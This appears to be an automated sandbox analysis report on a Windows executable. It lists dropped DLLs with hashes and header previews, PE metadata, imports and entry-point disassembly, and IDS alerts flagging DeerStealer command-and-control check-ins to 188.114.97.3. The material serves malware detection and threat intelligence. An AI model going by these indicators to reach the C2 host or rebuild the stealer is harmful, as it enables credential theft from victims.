                                                                                                                SHA-512:484E32832D69EC1799BD1BCC694418801C443C732ED59ECD76B3F67ABF0B1C97D64AE123728DFA99013DF846BA45BE310502EF6F8DA42155DA2E89F2A1E8CB2C
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Ke[...5...5...5..|....5......5.4Z6...5.4Z1...5.4Z4...5.4Z0...5.|f4...5..Z4...5...4...5..Z1...5..Z0.W.5..Z5...5..Z...5.......5..Z7...5.Rich..5.................PE..d...>.n].........." .....f9...)......Z9.......................................c.......c...`.........................................`.C.<.....\.@.....c......._.<.....c.x.....c..,..0r?.T...................(s?.(....r?...............9../...........................text...be9......f9................. ..`.rdata...b$...9..d$..j9.............@..@.data........]..T....].............@....pdata..<....._......"_.............@..@.gfids..4....`c.......b.............@..@.tls.........pc.......b.............@....rsrc.........c.......b.............@..@.reloc...,....c.......b.............@..B................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\TVr2Z822J3.exe
                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1314424
                                                                                                                Entropy (8bit):6.382115484562211
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:txQym4jK56LNWz/m7iNBd3ol84iKiEanXC:t1mrCNxiNBulliKiEaXC
                                                                                                                MD5:FE5ED4C5DA03077F98C3EFA91ECEFD81
                                                                                                                SHA1:E23E839EC0602662788F761EBE7DD4B39C018A7F
                                                                                                                SHA-256:D992AAEB21CB567113126C2912CF75E892C8E3EAD5D50147A11ABE704B9E2E2B
                                                                                                                SHA-512:22514732A0EDF8FC2B8770139599132429080B86D2844143D21BB834CBDDAAA077D763969960E39E2050A69493C1AAE191600E5DF6107BDE90FAE589A054F071
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Y?1.8Qb.8Qb.8Qb.@.b.8Qb.fRc.8Qb.fUc.8Qb.fPc.8Qb.fTc.8Qb.ZPc.8Qb.fPc.8Qb.8Pb`;Qb.fTc.8Qb.fQc.8Qb.f.b.8Qb.8.b.8Qb.fSc.8QbRich.8Qb........PE..d.....n].........." .........z...............................................`............`......................................... ...._...#..,....0....... ..T.......x....@.........T......................(...0................... ............................text...7........................... ..`.rdata...=.......>..................@..@.data....4......."..................@....pdata..T.... ......................@..@.gfids..4...........................@..@.tls......... ......................@....rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\TVr2Z822J3.exe
                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):324216
                                                                                                                Entropy (8bit):6.424811123526958
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6144:n5BVjwbCL85ofdeA2aqWs+41FwneMKAaol1cafGR27M1ffqp+1eszZnDy4SA:nBjwE8aVK
                                                                                                                MD5:D0634933DB2745397A603D5976BEE8E7
                                                                                                                SHA1:DDEC98433BCFEC1D9E38557D803BC73E1FF883B6
                                                                                                                SHA-256:7D91D3D341DBBA568E2D19382E9D58A42A0D78064C3AD7ADFE3C7BB14742C2B1
                                                                                                                SHA-512:9271370CD22115F68BD62572640525E086A05D75F5BC768F06E20B90B48A182F29A658A07099C7BC1E99BF0FFCF1229709524E2AF6745D6FED7B41C1ADDD09F1
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........r.....}...}...}.k.}...}.M.|...}.M.|...}.M.|...}.M.|...}.q.|...}zM.|...}...}...}zM.|...}zM.|...}.Mc}...}...}...}zM.|...}Rich...}................PE..d....n].........." .........................................................0.......H....`..........................................M...p.......................&......x.... ..@.......T.......................(.......................P"...........................text............................... ..`.rdata..............................@..@.data...............................@....pdata...&.......(..................@..@.gfids..4...........................@..@.tls................................@....rsrc...............................@..@.reloc..@.... ......................@..B................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\TVr2Z822J3.exe
                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):5539448
                                                                                                                Entropy (8bit):6.61165878012579
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:98304:oSIq7lPpagrGUtPm3qBF+1jIJJAi+eVq8:oSI8hagrGUtPm3KMRIL+e/
                                                                                                                MD5:C502BB8A4A7DC3724AB09292CD3C70D6
                                                                                                                SHA1:FF44FDDEEC2D335EC0EAA861714B561F899675FD
                                                                                                                SHA-256:4266918226C680789D49CF2407A7FEC012B0ED872ADAFB84C7719E645F9B2E6D
                                                                                                                SHA-512:73BEF89503CE032FBA278876B7DAB9EAC275632DF7A72C77093D433C932272DA997E8FBEB431A09D84BAAC7B2AB2E55222FF687893311949A5603E738BFA6617
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;....b..b..b.v.H.wb.D<.|b.D<.ub.D<.{b.D<.hb....ub..<.zb..b.no..<..b..<.~b..<$.~b..bL.~b..<.~b.Rich.b.................PE..d.....n].........." ......3... .......3.......................................T......4U...`......................................... .D.TQ..t>M......@T.......P..e...pT.x....PT.... =@.T....................>@.(....=@...............4..h...........................text.....3.......3................. ..`.rdata........4.......4.............@..@.data........P..~....O.............@....pdata...e....P..f...rP.............@..@.gfids..4.... T.......S.............@..@.tls.........0T.......S.............@....rsrc........@T.......S.............@..@.reloc......PT.......S.............@..B................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\TVr2Z822J3.exe
                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1505376
                                                                                                                Entropy (8bit):6.361832549375939
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:NbKpao+9Uybarjs1FHw9guJfkTK39MOCRZnVVWjk+amEObzznf9:NbKpaGEw9diEjkuEObzznf9
                                                                                                                MD5:41E19BA2364F2C834B2487E1D02BB99A
                                                                                                                SHA1:6C61D603DDDFE384A93AD33775B70681D0A396D9
                                                                                                                SHA-256:C040A25377028B0C28DB81A012DE786C803A0E9D6F87CE460335A621D31F5340
                                                                                                                SHA-512:6EBF4A9E80F16C6A03FF357D2DA9A34A4227BFD65EB66D1D335349A77BA066D069BA0D47D46229B3C77B59052C42D388678662F970B418D8CC3CFB1223427D8C
                                                                                                                Malicious:false
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............ho..ho..ho.....ho.....ho.....ho..hn.{ho......ho.....Zho.....ho.....ho......ho......ho......ho.Rich.ho.................PE..d...u.NK.........." .........2...............................................P............@.............................................C6......d............p..$u......`.... ......`...............................................X................................text............................... ..`.data............^..................@....pdata..$u...p...v..................@..@.idata..............................@....rsrc...............................@..@.reloc...&... ...&..................@..B................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\TVr2Z822J3.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4608873
                                                                                                                Entropy (8bit):7.958889302680503
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:98304:yrR9F0WCyNwWKIVyFlF5a8qLn6WK/M4jb64MbzGzpZ3ICk:QjFnnxxyFPiZK/MCgbzGT3ICk
                                                                                                                MD5:0ABD50C8D2FAE352F4017D0177C63DD6
                                                                                                                SHA1:597C7AACA89C0D281BA5713799FCAE97C595321C
                                                                                                                SHA-256:3292060C07C495ED061CF362CE7788B977B111A8F163CA2F5038080DED66D14B
                                                                                                                SHA-512:28AC1F826F00D8E70BAC19773EEC4D14F0EB308AD33229DC900855B45BFCFC7EA4AF4D2B025342EB96E9B6BB17D0FE47577B031177653220720B361D0397A6FC
                                                                                                                Malicious:false
                                                                                                                Preview:..I.`C.Bn..Tk[]g.....Y....HnB.KU.s.U..`...D.cc.tm`M..bS.....vi..b.......IZ.P.tiRpU.q..R.P..rCd[...o.VOQ]Xc..cM.V.ilY..\.sI...J.i...cd.b.wOF.^...mA.b.k.iX.`..Pwj...RL.xV......r^S..RTPk..._.Ak.TN.kZ....yV......h.\...y.g.e..Il.]..mXE_.M.O..l.KZ.tU\...WH.....RiK..p...EO.L.H..E.QH....qctw....L.A..\Cdv.Cf...Hl..HGVBM...pRdZ...WT...L]x..FX....l.E.`b.....k.KQdx...S.RVF.J.vI..SZ..ijbyV.c_..GBqShamxdX..T...Nd....L...r.S..Vs.^[J.S.^..IR....I..T..\T.v_.d.`..ns.WXbR....Od.....dEoJ..ZtT.lg.]vy.q.fs.g.W._....K...gY....M..lO.._.ujp..`.O..iAN..W..R..M`..E...L..Y.HDvVst.hb.MYp......wY..G..H..i...[T.A.Aprxmagr.s...R.MS..B.OjgJtZ..R.ia..jQ..o......nbPB..kQ..juD.j.Vqs\Vh..[..._.sd.Mj\mo.CLQTW..s.]...CJ.h.ly.Lf...g...y.M.As.ftxs..p.AV.h\...V.rA.ND..f..d..N..[..O.f_rr..G.dWwFiAxlb....obtEPy..K.d.....Dg._s...X]Ov...EXW.ts.cTY...MB.....d.fe..Gipq.^.C..H....r...KHkh.]..F[q..T...U.g^OL.k.ou.b..B_.W..fp.g.jevD..t.P.o...SOr.L...NJp[.ka.N.M..L.a..p....j...qT.....eX.k..lH..i....d..jd.G....`..DS.....lB.....GPps.....h
                                                                                                                Process:C:\Users\user\Desktop\TVr2Z822J3.exe
                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):571312
                                                                                                                Entropy (8bit):6.492350759123951
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12288:Rsjw3shF+jss1I8CgEWTe5+YMCMGz2MMY5U489wiyaf+QEKZm+jWodEEVksLd:Rs/5U4RBaf+QEKZm+jWodEECsL
                                                                                                                MD5:7DB24201EFEA565D930B7EC3306F4308
                                                                                                                SHA1:880C8034B1655597D0EEBE056719A6F79B60E03C
                                                                                                                SHA-256:72FE4598F0B75D31CE2DC621E8EF161338C6450BB017CD06895745690603729E
                                                                                                                SHA-512:BAC5729A3EB53E9BC7B680671D028CABEF5EA102DFAA48A7C453B67F8ECB358DB9F8FB16B3B1D9EA5A2DFF34F459F6AC87F3A563C736D81D31048766198FF11E
                                                                                                                Malicious:false
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T4...U...U...U...'...U...-8..U...U...U..p/...U..p/...U..p/...U..p/...U..p/...U..p/T..U..p/...U..Rich.U..........PE..d...,pd..........." ... .H...b.......3..............................................r.....`A.........................................H..h...."..,...............8:.......'......8.......p...........................@...@............`...............................text....G.......H.................. ..`.rdata..b....`.......L..............@..@.data...P:...@.......(..............@....pdata..8:.......<...F..............@..@.rsrc...............................@..@.reloc..8...........................@..B................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\TVr2Z822J3.exe
                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):98736
                                                                                                                Entropy (8bit):6.474996871326343
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:BxhUQePlHhR46rXHHGI+mAAD4AeDuXMycecb8i10DWZz:Bvk4wHH+mZD4ADAecb8G1
                                                                                                                MD5:F12681A472B9DD04A812E16096514974
                                                                                                                SHA1:6FD102EB3E0B0E6EEF08118D71F28702D1A9067C
                                                                                                                SHA-256:D66C3B47091CEB3F8D3CC165A43D285AE919211A0C0FCB74491EE574D8D464F8
                                                                                                                SHA-512:7D3ACCBF84DE73FB0C5C0DE812A9ED600D39CD7ED0F99527CA86A57CE63F48765A370E913E3A46FFC2CCD48EE07D823DAFDD157710EEF9E7CC1EB7505DC323A2
                                                                                                                Malicious:false
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.&k..H8..H8..H8.I9..H8...8..H8..I8(.H8e.K9..H8e.L9..H8e.M9..H8e.H9..H8e..8..H8e.J9..H8Rich..H8................PE..d....9............" ... .....`......`.....................................................`A........................................0C..4...dK...............p..p....Z...'...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......B..............@....pdata..p....p.......F..............@..@_RDATA..\............R..............@..@.rsrc................T..............@..@.reloc...............X..............@..B........................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\TVr2Z822J3.exe
                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):38304
                                                                                                                Entropy (8bit):6.3923853431578035
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:Xhh4pTUUtmUwqiu8oSRjez6SD7GkxZYj/9zLUr:xJ9x70GkxuZz2
                                                                                                                MD5:75E78E4BF561031D39F86143753400FF
                                                                                                                SHA1:324C2A99E39F8992459495182677E91656A05206
                                                                                                                SHA-256:1758085A61527B427C4380F0C976D29A8BEE889F2AC480C356A3F166433BF70E
                                                                                                                SHA-512:CE4DAF46BCE44A89D21308C63E2DE8B757A23BE2630360209C4A25EB13F1F66A04FBB0A124761A33BBF34496F2F2A02B8DF159B4B62F1B6241E1DBFB0E5D9756
                                                                                                                Malicious:false
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L......................h.........G.........:...h.......h.......h.......h.......h.+.....h.......Rich............................PE..d................." ... .:...6.......A..............................................B.....`A.........................................m.......m..x....................n...'......D....c..p...........................`b..@............P..`............................text....9.......:.................. ..`.rdata..."...P...$...>..............@..@.data................b..............@....pdata...............d..............@..@.rsrc................h..............@..@.reloc..D............l..............@..B................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\TVr2Z822J3.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):15745
                                                                                                                Entropy (8bit):6.185378376185804
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:l/Yzs6zZ+ic3FE2IUZmwKy8mfOCdLnryfBsFhs:lgzsITfkmwKy8ZhKFW
                                                                                                                MD5:DD899CA13E5BEF55BCEA07E167DA891B
                                                                                                                SHA1:E883F0240F127520486F063B033FB34FA2DFE5C1
                                                                                                                SHA-256:A818D6FA8CADDAA608345EA40B75073A7C98637161794918566E2DDEEEDE47E7
                                                                                                                SHA-512:E38437899FCC433EF89A04C6A68684EA5110181AF48A4699836939CF167D0C1FE7932432518445E90ACBCBC151EE324D77DE064147D97FDEDF6ECABAAC788C06
                                                                                                                Malicious:false
                                                                                                                Preview:.m.c.T^YvvPEcE..l.avS...P.._..h..Dlx.hCl.fu......Ih.f...B..JIR..pG.c.G.iaX.g.d..T...u\.r..].Uu.V...k..R.WXwsZx.QMQ..S.r..^...ZZ.b.a...n`jfH.`]SKoUQw..D.......s...tY..OT.b..lENXo.p...Hd.RWjEw.......Y..u.C.......rp.a.V.oN\c_UC.ox.Q......X....YwX..tkn.V...g.W^c._B....EdgW.gu.YN..ICA.p.....Z.o.ev.N..tH....pyyLt.T..A.XHk.duaxpkY.AUT.....gp.TCn..Sxjm...EM...Cb[U.t.ZGlC.c.dT.mYl...R.nJ.....drk..qLuv.y.q..COa.....D....hU._..e.....^]..C.X..IP.Z.BXf.X.b....y.QwB.txZ..^B.....Mp\j...Z.il.f...UQ.x.e`.^.....Mw.Z....ud[oVNa..d..o.HJsP.wY...Af...A.M.Ur.X..S.i[j..VE...I..iiqH...s^...B.I..ZV....`rUNP.....n...JS..Qq..R..Qvar...Z.Ce..Vac[S...I.[.D.....D.qWS.k.V]vG.EVLk..v.XwoA....w..lE.n.m..UPm.Iai.u.......kAhf.Q.n.t.g.v.^P..c._.hC\b.cpc..L.......o...C`.`Q.O..NF.[.V.e..U\hj.X.u.ZHnL.f.....SAm.G..X]..X.FJ....K.....j[..e.ndEI..cDq..bB.a.fDX...YK....Tm.rAK.......I......HotwdB..K.v^qM.mM.`Rc..LI..LKR.......Rv.L....qO....`l..vG.Vjt.N...If[..A..`....h...t.t]...b..re.fm.PqOik.faF.U.J..X..FKG.\H.B..I..WXA._..R.N.
                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Entropy (8bit):7.997888361970767
                                                                                                                TrID:
                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                File name:TVr2Z822J3.exe
                                                                                                                File size:11'140'776 bytes
                                                                                                                MD5:467e95c9a46987552925c47bc7b38916
                                                                                                                SHA1:3732116b8ef5ee6094ea49a0658dcb7a7adb2634
                                                                                                                SHA256:abe7cc92554b2defc6c336d5cafabe798f1f6c75076ccce897d6337fdbc42fd5
                                                                                                                SHA512:f79659b65bd565785c6ae5ac442a8e5c016cbda9968eea7267a7d281f13cfe04f6228e3e311a0ae7f7848d9e0e407cefc16001cd28bd7e631414d5bd206695b7
                                                                                                                SSDEEP:196608:FppMHcmWuVIdrgeXoNY9kRsYuXZx7bbWtKm2eRe2tfny7NY+Uvl7a9tJJwZ4OZ7c:Fppky+IJX9kIOATpYtl7a9ZwZBZY
                                                                                                                TLSH:A9B63394B5E358F3C17521B0EC696C1222B7A32A45E14E0B8BC76F1946E37A7428F35F
                                                                                                                File Content Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...~.&L.....................J...............0....@.................................L........................................P..........,..................
                                                                                                                Icon Hash:293250cc83f2623f
                                                                                                                Entrypoint:0x411def
                                                                                                                Entrypoint Section:.text
                                                                                                                Digitally signed:false
                                                                                                                Imagebase:0x400000
                                                                                                                Subsystem:windows gui
                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                DLL Characteristics:
                                                                                                                Time Stamp:0x4C26F87E [Sun Jun 27 07:06:38 2010 UTC]
                                                                                                                TLS Callbacks:
                                                                                                                CLR (.Net) Version:
                                                                                                                OS Version Major:4
                                                                                                                OS Version Minor:0
                                                                                                                File Version Major:4
                                                                                                                File Version Minor:0
                                                                                                                Subsystem Version Major:4
                                                                                                                Subsystem Version Minor:0
                                                                                                                Import Hash:b5a014d7eeb4c2042897567e1288a095
                                                                                                                Instruction
                                                                                                                push ebp
                                                                                                                mov ebp, esp
                                                                                                                push FFFFFFFFh
                                                                                                                push 00414C50h
                                                                                                                push 00411F80h
                                                                                                                mov eax, dword ptr fs:[00000000h]
                                                                                                                push eax
                                                                                                                mov dword ptr fs:[00000000h], esp
                                                                                                                sub esp, 68h
                                                                                                                push ebx
                                                                                                                push esi
                                                                                                                push edi
                                                                                                                mov dword ptr [ebp-18h], esp
                                                                                                                xor ebx, ebx
                                                                                                                mov dword ptr [ebp-04h], ebx
                                                                                                                push 00000002h
                                                                                                                call dword ptr [00413184h]
                                                                                                                pop ecx
                                                                                                                or dword ptr [00419924h], FFFFFFFFh
                                                                                                                or dword ptr [00419928h], FFFFFFFFh
                                                                                                                call dword ptr [00413188h]
                                                                                                                mov ecx, dword ptr [0041791Ch]
                                                                                                                mov dword ptr [eax], ecx
                                                                                                                call dword ptr [0041318Ch]
                                                                                                                mov ecx, dword ptr [00417918h]
                                                                                                                mov dword ptr [eax], ecx
                                                                                                                mov eax, dword ptr [00413190h]
                                                                                                                mov eax, dword ptr [eax]
                                                                                                                mov dword ptr [00419920h], eax
                                                                                                                call 00007F9124DDA202h
                                                                                                                cmp dword ptr [00417710h], ebx
                                                                                                                jne 00007F9124DDA0EEh
                                                                                                                push 00411F78h
                                                                                                                call dword ptr [00413194h]
                                                                                                                pop ecx
                                                                                                                call 00007F9124DDA1D4h
                                                                                                                push 00417048h
                                                                                                                push 00417044h
                                                                                                                call 00007F9124DDA1BFh
                                                                                                                mov eax, dword ptr [00417914h]
                                                                                                                mov dword ptr [ebp-6Ch], eax
                                                                                                                lea eax, dword ptr [ebp-6Ch]
                                                                                                                push eax
                                                                                                                push dword ptr [00417910h]
                                                                                                                lea eax, dword ptr [ebp-64h]
                                                                                                                push eax
                                                                                                                lea eax, dword ptr [ebp-70h]
                                                                                                                push eax
                                                                                                                lea eax, dword ptr [ebp-60h]
                                                                                                                push eax
                                                                                                                call dword ptr [0041319Ch]
                                                                                                                push 00417040h
                                                                                                                push 00417000h
                                                                                                                call 00007F9124DDA18Ch
                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x150dc0xb4.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1a0000x10f2c.rsrc
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x130000x310.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                .text0x10000x113170x11400797279c5ab1a163aed1f2a528f9fe3ceFalse0.6174988677536232data6.576987441854239IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                .rdata0x130000x30ea0x32001359639b02bcb8f0a8743e6ead1c0030False0.43828125data5.549434098115495IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                .data0x170000x292c0x8009415c9c8dea3245d6d73c23393e27d8eFalse0.431640625data3.6583182363171756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .rsrc0x1a0000x10f2c0x1100082df3bd29b0c4c5afa8fd54b0dad9402False0.21841969209558823data4.5319461046262575IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                RT_ICON0x1a1300x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584RussianRussia0.2107831539098545
                                                                                                                RT_GROUP_ICON0x2a9580x14dataRussianRussia1.15
                                                                                                                RT_VERSION0x2a96c0x350dataEnglishUnited States0.47523584905660377
                                                                                                                RT_MANIFEST0x2acbc0x270ASCII text, with very long lines (624), with no line terminatorsEnglishUnited States0.5144230769230769
                                                                                                                DLLImport
                                                                                                                COMCTL32.dll
                                                                                                                KERNEL32.dllGetFileAttributesW, CreateDirectoryW, WriteFile, GetStdHandle, VirtualFree, GetModuleHandleW, GetProcAddress, LoadLibraryA, LockResource, LoadResource, SizeofResource, FindResourceExA, MulDiv, GlobalFree, GlobalAlloc, lstrcmpiA, GetSystemDefaultLCID, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, MultiByteToWideChar, GetLocaleInfoW, lstrlenA, lstrcmpiW, GetEnvironmentVariableW, lstrcmpW, GlobalMemoryStatusEx, VirtualAlloc, WideCharToMultiByte, ExpandEnvironmentStringsW, RemoveDirectoryW, FindClose, FindNextFileW, DeleteFileW, FindFirstFileW, SetThreadLocale, GetLocalTime, GetSystemTimeAsFileTime, lstrlenW, GetTempPathW, SetEnvironmentVariableW, CloseHandle, CreateFileW, GetDriveTypeW, SetCurrentDirectoryW, GetModuleFileNameW, GetCommandLineW, GetVersionExW, CreateEventW, SetEvent, ResetEvent, InitializeCriticalSection, TerminateThread, ResumeThread, SuspendThread, IsBadReadPtr, LocalFree, lstrcpyW, FormatMessageW, GetSystemDirectoryW, DeleteCriticalSection, GetFileSize, SetFilePointer, ReadFile, SetFileTime, SetEndOfFile, EnterCriticalSection, LeaveCriticalSection, WaitForMultipleObjects, GetModuleHandleA, SystemTimeToFileTime, GetLastError, CreateThread, WaitForSingleObject, GetExitCodeThread, Sleep, SetLastError, SetFileAttributesW, GetDiskFreeSpaceExW, lstrcatW, ExitProcess, CompareFileTime, GetStartupInfoA
                                                                                                                USER32.dllCharUpperW, EndDialog, DestroyWindow, KillTimer, ReleaseDC, DispatchMessageW, GetMessageW, SetTimer, CreateWindowExW, ScreenToClient, GetWindowRect, wsprintfW, GetParent, GetSystemMenu, EnableMenuItem, EnableWindow, MessageBeep, LoadIconW, LoadImageW, wvsprintfW, IsWindow, DefWindowProcW, CallWindowProcW, DrawIconEx, DialogBoxIndirectParamW, GetWindow, ClientToScreen, GetDC, DrawTextW, ShowWindow, SystemParametersInfoW, SetFocus, SetWindowLongW, GetSystemMetrics, GetClientRect, GetDlgItem, GetKeyState, MessageBoxA, wsprintfA, SetWindowTextW, GetSysColor, GetWindowTextLengthW, GetWindowTextW, GetClassNameA, GetWindowLongW, GetMenu, SetWindowPos, CopyImage, SendMessageW, GetWindowDC
                                                                                                                GDI32.dllGetCurrentObject, StretchBlt, SetStretchBltMode, CreateCompatibleBitmap, SelectObject, CreateCompatibleDC, GetObjectW, GetDeviceCaps, DeleteObject, CreateFontIndirectW, DeleteDC
                                                                                                                SHELL32.dllSHGetFileInfoW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetMalloc, ShellExecuteExW, SHGetSpecialFolderPathW, ShellExecuteW
                                                                                                                ole32.dllCoInitialize, CreateStreamOnHGlobal, CoCreateInstance
                                                                                                                OLEAUT32.dllVariantClear, OleLoadPicture, SysAllocString
                                                                                                                MSVCRT.dll__set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, _CxxThrowException, _beginthreadex, _EH_prolog, memset, _wcsnicmp, strncmp, malloc, memmove, _wtol, memcpy, free, memcmp, _purecall, ??2@YAPAXI@Z, ??3@YAXPAX@Z, _except_handler3, _controlfp
                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                RussianRussia
                                                                                                                EnglishUnited States
                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                2024-11-14T19:56:53.472277+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749180188.114.97.3443TCP
                                                                                                                2024-11-14T19:56:54.027538+01002056550ET MALWARE Win32/DeerStealer CnC Checkin1192.168.2.749180188.114.97.3443TCP
                                                                                                                2024-11-14T19:56:55.316793+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749191188.114.97.3443TCP
                                                                                                                2024-11-14T19:56:56.987750+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749202188.114.97.3443TCP
                                                                                                                2024-11-14T19:57:00.659841+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749218188.114.97.3443TCP
                                                                                                                2024-11-14T19:57:03.390674+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749234188.114.97.3443TCP
                                                                                                                2024-11-14T19:57:05.079525+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749241188.114.97.3443TCP
                                                                                                                2024-11-14T19:57:07.345394+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749251188.114.97.3443TCP
                                                                                                                2024-11-14T19:57:08.795187+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749258188.114.97.3443TCP
                                                                                                                2024-11-14T19:57:10.927041+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749263188.114.97.3443TCP
                                                                                                                2024-11-14T19:57:12.682251+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749264188.114.97.3443TCP
                                                                                                                2024-11-14T19:57:44.181061+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749265188.114.97.3443TCP
                                                                                                                2024-11-14T19:57:45.085102+01002056550ET MALWARE Win32/DeerStealer CnC Checkin1192.168.2.749265188.114.97.3443TCP
